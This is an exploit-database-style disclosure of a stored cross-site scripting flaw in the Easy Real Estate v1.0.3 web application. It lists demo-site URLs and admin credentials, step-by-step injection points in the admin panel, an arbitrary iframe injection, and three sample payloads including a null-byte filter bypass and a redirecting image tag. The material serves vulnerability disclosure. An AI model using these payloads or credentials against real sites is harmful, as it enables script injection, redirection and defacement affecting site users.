[*] :: Title: Easy Real Estate v1.0.3 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-30
[*] :: Software: Easy Real Estate v1.0.3
[?] :: Technical Details & Description:
# Weak security measures like bad input fields data filtering has been discovered in the «Easy Real Estate» web-application. Current version is 1.0.3.
[?] :: Demo Website:
# https://codecanyon.net/item/easy-real-estate-/8249131
# Frontend: http://lrandomdev.com/demo/realestates
# Backend: http://lrandomdev.com/demo/realestates/admin/dashboard
# Login/Password (admin): admin/admin
[!] :: Special Note:
# After injections you'll see that some blocks on the edited page are broken due to poor code quality at all.
# It's possible to inject the <iframe> on the target page twice, probably because XSS filter isn't work properly.
[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# http://lrandomdev.com/demo/realestates/
# http://lrandomdev.com/demo/realestates/properties/detail/57/
# http://lrandomdev.com/demo/realestates/properties/detail/39/HvfhhzQUIXSS
[+] :: PoC [Stored XSS Injection]:
# Go to the demo website http://lrandomdev.com/demo/realestates/admin/dashboard and log in as admin. Then f.e., go to http://lrandomdev.com/demo/realestates/admin/pages/edit?id=4 page and inject your payload in the «Content» text area (use «HTML» view to work with your code inside WYSIWYG editor). Save the data and your payload will be successfully injected. Plus, you can inject any <iframe> you want by using code like <iframe src="http://defcon.su" width="1200" height="900"></iframe>.
# It's easy to bypass XSS filter on another pages too, f.e.: http://lrandomdev.com/demo/realestates/admin/amenities -> inside the «Name» textfield use payload like sample #3, save the data and check it out.
# Sample payload #1: <div onmouseover='alert(`QUIXSS`)'>
# Sample payload #2: <img src='https://i.imgur.com/zRm8R9z.gif' onmouseover='window.location.replace(`https://twitter.com/quixss`);'>
# Sample payload #3: "><iframe %00 src="	javascript:prompt(1)	"%00>